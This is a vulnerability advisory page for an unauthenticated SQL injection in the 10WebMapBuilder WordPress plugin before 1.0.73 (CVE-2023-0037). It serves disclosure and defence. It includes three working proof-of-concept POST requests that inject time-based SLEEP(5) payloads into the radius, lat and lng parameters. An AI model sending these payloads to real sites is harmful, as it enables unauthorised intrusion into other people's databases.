Lucene search
Daniel KrohmerWPEX-ID:33AB1FE2-6611-4F43-91BA-52C56F02ED56HistoryFeb 20, 2023 - 12:00 a.m.
10WebMapBuilder < 1.0.73 - Unauthenticated SQLi
2023-02-2000:00:00
Daniel Krohmer
71
unauthenticated sqli
10webmapbuilder
google maps wd
post request
content-type
content-length
sleep(5)
0.003 Low
EPSS
Percentile
70.7%
The plugin does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
Note: /2022/12/29/map/ is page/post where the Google_Maps_WD is embed
POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&lat=0.0&lng=0.0&distance_in=km
POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
radius=1&lat=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)--+)&lng=0.0&distance_in=km
POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
radius=1&lat=0.0&lng=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)--+)&distance_in=kmRelated
wpvulndb
wpvulndb
10WebMapBuilder < 1.0.73 - Unauthenticated SQLi
2023-02-20 00:00:00
prion
prion
Sql injection
2023-03-13 17:15:00
cve
cve
CVE-2023-0037
2023-03-13 17:15:12
nvd
nvd
CVE-2023-0037
2023-03-13 17:15:12
cvelist
cvelist
CVE-2023-0037 10WebMapBuilder < 1.0.73 - Unauthenticated SQLi
2023-03-13 16:03:32